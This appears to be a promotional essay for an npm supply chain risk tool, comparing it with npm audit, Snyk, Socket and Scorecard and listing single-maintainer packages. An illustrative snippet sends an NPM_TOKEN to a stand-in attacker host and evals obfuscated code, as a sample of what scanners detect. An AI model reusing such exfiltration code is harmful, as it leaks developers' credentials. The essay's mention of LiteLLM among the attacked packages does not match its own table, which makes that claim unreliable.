Why npm audit Returns Zero Vulnerabilities for the Most Dangerous Packages

The tools that protect npm all answer different questions. None of them measure the thing that predicts supply chain attacks — structural single points of failure. The data is public. The gap is enormous.

Before the ua-parser-js attack in October 2021, you could have run npm audit against any project that depended on it. It would have returned:

found 0 vulnerabilities

In October 2021, ua-parser-js — 7 million weekly downloads, used by Facebook, Microsoft, Amazon, and Google — was compromised. A malicious release deployed a cryptominer and a credential-stealing trojan to every CI pipeline and production server that ran npm install. The malicious versions were live for roughly four hours before they were pulled.

Snyk returned the same result. Socket hadn’t scanned the version yet. OpenSSF Scorecard gave the repository a respectable score. Every tool in the npm security ecosystem reported the same thing: nothing wrong here.

They were all telling the truth. And they were all missing the same thing.


The measurement gap

The npm security ecosystem has four major tools. Each one answers a different question. None of them answers the question that would have caught the ua-parser-js attack in advance — because it’s a question nobody is asking.

npm audit: “Does this package have a reported CVE?”

npm audit submits your dependency tree to the registry’s advisory endpoint, which is backed by GitHub’s Advisory Database, and returns known matches. It’s free, built-in, and reactive. When someone discovers a vulnerability, documents it, and files a CVE, npm audit will eventually surface it.
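
If you want to see exactly what that lookup reports, here is a minimal sketch of driving it from a script. It assumes npm 7 or later (earlier versions emit a different JSON shape) and only reads what npm audit already prints.

// Sketch: run npm audit programmatically and read the severity totals.
// npm audit exits non-zero whenever it finds something, so the stdout
// attached to the thrown error is captured as well.
import { execSync } from "node:child_process";

function auditCounts(cwd = process.cwd()) {
  let stdout;
  try {
    stdout = execSync("npm audit --json", { cwd, encoding: "utf8" });
  } catch (err) {
    stdout = err.stdout; // a non-zero exit still produces a full JSON report
  }
  return JSON.parse(stdout).metadata.vulnerabilities;
}

console.log(auditCounts());
// For a project depending on ua-parser-js before October 22, 2021:
// { info: 0, low: 0, moderate: 0, high: 0, critical: 0, total: 0 }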

The limitation is temporal. A CVE can only exist after an attack has been discovered, analyzed, and reported. For the ua-parser-js attack, the timeline was: malicious release on October 22, 2021, community detection within hours, CVE filed days later. For that entire window, npm audit returned zero. For the years before the attack, while the structural conditions were visible, npm audit returned zero.

This isn’t a bug. It’s a design constraint. npm audit is a known vulnerability scanner. The industry treats it as a supply chain security tool. Those are different things.

Snyk: “Does this package have a known vulnerability, and how do I fix it?”

Snyk expands on npm audit with a proprietary vulnerability database, license compliance checking, SAST for your own code, and auto-fix PRs. It’s excellent at what it does: once a vulnerability is known, Snyk helps you find it and fix it faster than npm audit alone.

But the detection model is the same. Snyk scans for known issues. It adds license risk (useful) and first-party code scanning (different problem). For unknown supply chain risk — the “is this package a high-value attack target?” question — Snyk has the same blind spot as npm audit. The database doesn’t contain entries for attacks that haven’t happened yet.

Socket: “Is this package doing something dangerous right now?”

Socket is genuinely different from the first two. Instead of looking up CVEs, it performs static analysis on the actual published package source. It looks for suspicious patterns: eval of dynamic strings, network calls to unusual endpoints, obfuscated code, environment variable access. For token-compromise attacks like ua-parser-js, Socket's approach catches malicious code within minutes of the bad version landing on the registry.
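
To make that concrete, here is a deliberately artificial snippet (not taken from any real payload, and not how Socket itself is implemented) that packs those patterns into a few lines: credential access through environment variables, a network call to an unfamiliar endpoint, and eval of an obfuscated string.

// Illustrative only: the kinds of capabilities static analysis flags.
const exfil = JSON.stringify({
  npmToken: process.env.NPM_TOKEN,   // environment / credential access
  ci: process.env.CI,
});

fetch("https://attacker.example/collect", {   // network call to an unfamiliar endpoint
  method: "POST",
  body: exfil,
}).catch(() => {});

// obfuscated dynamic code: the string decodes to console.log("hi")
eval(Buffer.from("Y29uc29sZS5sb2coImhpIik=", "base64").toString());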

Minutes after publication is fast. It’s also minutes after the malicious code was already available for installation. Socket catches attacks at the moment of publication, not before. It can’t tell you in advance that a package is structurally risky — because the code is clean until the moment it isn’t. The problem isn’t in the code. The problem is in the structure.

OpenSSF Scorecard: “Does this repository follow security best practices?”

The OpenSSF Scorecard is the closest existing tool to measuring proactive risk. It evaluates GitHub repository hygiene: branch protection, CI/CD configuration, signed commits, dependency pinning, SAST integration. It answers whether the project does security well.

The gap is that Scorecard measures practices, not structural exposure. A repository can have perfect branch protection, signed releases, and comprehensive CI — and still have one person with the npm publish token. Scorecard evaluates the GitHub repository. The npm registry is a different system with different access controls and different attack surfaces. The axios repository followed reasonable practices. The vulnerability wasn’t in the repo. It was in the registry credential.

Scorecard also doesn’t weigh blast radius. A toy package with 100 downloads and a critical infrastructure package with 500 million downloads can get the same score. Structural risk requires both the vulnerability condition and the impact multiplier.


The question nobody is asking

All four tools are reactive or practice-oriented. None asks the structural question:

Is this package a single point of failure at enormous scale — right now, before any attack has occurred?

That question is answerable from public data. The npm registry exposes maintainer count for every package. Download statistics are published weekly. You can compute the structural risk profile of any package in milliseconds without scanning a single line of code.
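
A sketch of that computation, using only the two public endpoints involved. It assumes an unscoped package name, Node 18+ for the built-in fetch, and an .mjs file for top-level await.

// Sketch: the structural profile of a package from public npm data alone.
// The packument carries the maintainer list; the downloads API carries
// last week's install count.
const name = process.argv[2] ?? "minimatch";

const packument = await (
  await fetch(`https://registry.npmjs.org/${name}`)
).json();
const stats = await (
  await fetch(`https://api.npmjs.org/downloads/point/last-week/${name}`)
).json();

const maintainerCount = (packument.maintainers ?? []).length;
const weeklyDownloads = stats.downloads ?? 0;

console.log({ name, maintainerCount, weeklyDownloads });
// minimatch at the time of writing: one maintainer account,
// several hundred million weekly downloads.

The flag condition below consumes exactly these two numbers.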

proof-of-commitment asks this question. It scores packages across five behavioral dimensions — longevity, download momentum, release consistency, maintainer depth, and GitHub backing — and flags packages where the structural profile matches what supply chain attackers select for.

The critical flag condition is embarrassingly simple:

if (maintainerCount === 1 && weeklyDownloads > 10_000_000)
  riskFlags.push("CRITICAL");

One maintainer. More than 10 million weekly downloads. That’s it. If you’re a skeptical engineer, you’re thinking this is too simple. But simplicity is the point — the attack surface is structural, not behavioral. What matters is how many credentials an attacker needs to compromise and what they gain by doing so.


The data

We ran 30 of the most-downloaded npm packages through the proof-of-commitment API on April 21, 2026. Here are the results, sorted by weekly downloads. Every number below is live from the npm registry.

CRITICAL: single maintainer, >10M weekly downloads

Package            Weekly DLs   Maintainers   Score   Age
minimatch          569M         1             85      14.8y
chalk              412M         1             75      12.7y
supports-color     408M         1             75      11.9y
glob               335M         1             79      15.3y
@types/node        313M         1             88      9.9y
has-flag           267M         1             61      10.8y
postcss            210M         1             88      12.5y
esbuild            201M         1             88      8.4y
chokidar           161M         1             81      14y
zod                160M         1             83      6.1y
lodash             147M         1             87      14y
rimraf             130M         1             77      15.2y
is-core-module     127M         1             69      11.6y
mkdirp             116M         1             67      15.3y
once               111M         1             68      13.7y
wrappy             107M         1             61      11.6y
axios              100M         1             86      11.6y

ua-parser-js (2021): one maintainer, token compromised, malicious code deployed. Every package in this table shares that same structural risk profile.

17 packages. Combined weekly downloads: 3.8 billion. Every one of them has a single npm maintainer. Every one of them returns found 0 vulnerabilities from npm audit. Every one of them is structurally identical to ua-parser-js before it was compromised in 2021.

Not flagged: same download scale, distributed control

Package        Weekly DLs   Maintainers   Score
debug          556M         2             79
commander      370M         2             86
tslib          360M         6             86
source-map     280M         23            84
uuid           242M         2             85
acorn          198M         3             89
yargs          174M         2             81
react          127M         2             91
dotenv         120M         3             94
webpack        44M          8             97

The difference is not download count, project maturity, or code quality. It’s how many people have to be compromised before an attacker gets the npm publish token for a package that runs on millions of systems.


Why behavioral signals matter

The analogy that works best is credit scoring versus fraud detection.

Fraud detection (CVE scanning, code analysis) catches bad transactions after they happen. It’s reactive and essential. You absolutely need it. But credit scoring — the assessment of structural conditions that predict risk — operates on a different timescale. It asks: given the observable behavior of this entity, how likely is a future event?

In the npm ecosystem, the structural signals are:

  • Maintainer count. How many people can push a release? One is a single point of failure. Two or more means an attacker needs multiple credentials or social engineering campaigns.
  • Download volume. What’s the blast radius of a compromise? 100 downloads/week is a test project. 500 million is critical infrastructure.
  • Publish frequency. Is the maintainer actively present, or did they push a release three years ago and walk away? Abandoned packages are targets for maintainer takeover.
  • Contributor concentration. Are commits coming from one person or a team? Bus factor matters even without malice — what happens when the one maintainer burns out, changes jobs, or loses their laptop?

These are leading indicators. They describe conditions that exist before an attack, and they describe the conditions that make an attack rational from the attacker’s perspective. An attacker choosing between two targets will pick the one that requires fewer credentials to compromise and delivers more blast radius per effort.

That calculus is trivially computable from public data. Every number in the tables above comes from the npm registry API and the GitHub API. No scanning. No proprietary database. No machine learning. The data was always there.
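
The publish-frequency signal from the list above falls out of the same packument: the registry records a timestamp for every published version under its time field. A sketch, under the same assumptions as before:

// Sketch: how stale is the latest release? packument.time maps each version
// (plus "created" and "modified") to its publish timestamp.
const name = process.argv[2] ?? "once";

const packument = await (
  await fetch(`https://registry.npmjs.org/${name}`)
).json();

const latest = packument["dist-tags"].latest;
const lastPublish = new Date(packument.time[latest]);
const daysSince = Math.round((Date.now() - lastPublish.getTime()) / 86_400_000);

console.log(`${name}@${latest}: last published ${daysSince} days ago`);
// Years of silence plus a single maintainer is the takeover profile
// that event-stream exploited.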


The 2×2 matrix

The clearest way to see the gap is as a two-dimensional space. Every security tool operates in one quadrant:

                 Code-level                        Structural
Reactive         npm audit, Snyk
                 “Known bug in this version”
Near-realtime    Socket
                 “Suspicious code right now”
Proactive        OpenSSF Scorecard                 proof-of-commitment
                 “Good repo practices”             “Structural risk profile”

The bottom-right quadrant — proactive structural analysis — is the one that catches the conditions before the event. Every other quadrant is essential but responds to events rather than anticipating them.

This is not a replacement for npm audit, Snyk, or Socket. It’s a dimension they don’t cover. If you’re only using CVE scanners, you’re missing the structural layer. If you’re only using structural scoring, you’re missing known vulnerabilities. The responsible answer is both.


What we don’t do well

Honesty about limitations:

  • We don’t scan code. If a maintainer intentionally pushes a malicious release, we don’t detect the payload. Socket does. We tell you the structural risk existed; Socket tells you the exploit happened. You need both.
  • The CRITICAL threshold is a blunt instrument. “One maintainer and 10M+ downloads” catches the right packages, but the number 10M is a line we drew. We chose it because the two real-world attacks in 2026 (LiteLLM and axios) both met this condition. That’s validated in the narrow sense and undertested in the broad sense.
  • Maintainer count is a proxy. The npm registry reports the number of accounts with publish access. It doesn’t tell us about 2FA enrollment, token scoping, or whether those accounts are active. Two maintainers where one is dormant isn’t materially different from one maintainer.
  • We generate false positives. 17 packages flag CRITICAL. Two were attacked. The other 15 are correctly identified as structurally vulnerable but may never be targeted. A false positive in this context means “we flagged a real structural risk where the attack hasn’t happened yet.” Whether that’s useful depends on whether you’d rather be warned or surprised.
  • No CVE database. We don’t tell you about known bugs. If you replace npm audit with this, you’re worse off. Use both.

The complementary argument

The supply chain security stack should have three layers:

  1. Known vulnerability scanning (npm audit, Snyk). Catches documented bugs. The table stakes.
  2. Code-level anomaly detection (Socket). Catches malicious code at publish time. The early warning system.
  3. Structural risk assessment (proof-of-commitment). Identifies packages that will be high-value targets. The leading indicator.

Right now, most teams use layer 1 only. The sophisticated ones add layer 2. Almost nobody uses layer 3, because until two real-world attacks validated the signal, the “bus factor” argument was theoretical.

It’s not theoretical. The ua-parser-js attack (2021), event-stream (2018), and colors.js (2022) all exploited the exact structural condition that proof-of-commitment flags: a single maintainer controlling a package with massive download volume. All three had clean code, no CVEs, and good repo practices right up until the incident. The structural profile was the only anomaly.

Seventeen of the 30 packages we sampled still match that CRITICAL profile today. minimatch alone has 569 million weekly downloads.


Try it

The entire tool is open source and zero-install:

# Scan individual packages
npx proof-of-commitment axios zod chalk lodash

# Scan your project's dependencies
npx proof-of-commitment --file package-lock.json

# Yarn or pnpm
npx proof-of-commitment --file yarn.lock
npx proof-of-commitment --file pnpm-lock.yaml

Or use the web interface: getcommit.dev/audit

Or add it to CI with one line:

# one step in .github/workflows/audit.yml
- uses: piiiico/proof-of-commitment@main
  with:
    comment-on-pr: true

The API is public, the scoring is documented, and the methodology is in the README. If you think the threshold is wrong or the signals are incomplete, open an issue. This is a conversation about what we should be measuring, not a product pitch.


The bottom line

npm audit returns zero vulnerabilities for minimatch, chalk, glob, @types/node, postcss, esbuild, zod, lodash, and 9 other packages that are structurally identical to ua-parser-js before the 2021 compromise. They have clean code, no CVEs, and active maintenance. They also have a single maintainer controlling publish access to hundreds of millions of weekly installations.

The tools that protect npm do good work. But they’re measuring the wrong layer for the attacks that are actually happening. A supply chain attacker doesn’t need to find a bug in your code. They need to compromise one credential. And for 17 of the most critical packages in the JavaScript ecosystem, one credential is all there is.

The data to identify these packages is public, computable, and free. The only question is whether you check before the CVE or after.


All data in this essay was collected via the proof-of-commitment API on April 21, 2026. Numbers reflect live npm registry data at time of publication. Source: github.com/piiiico/proof-of-commitment

Audit your dependencies: getcommit.dev/audit | GitHub

For a detailed comparison of all four tools: Commit vs. Socket, Snyk, and npm audit
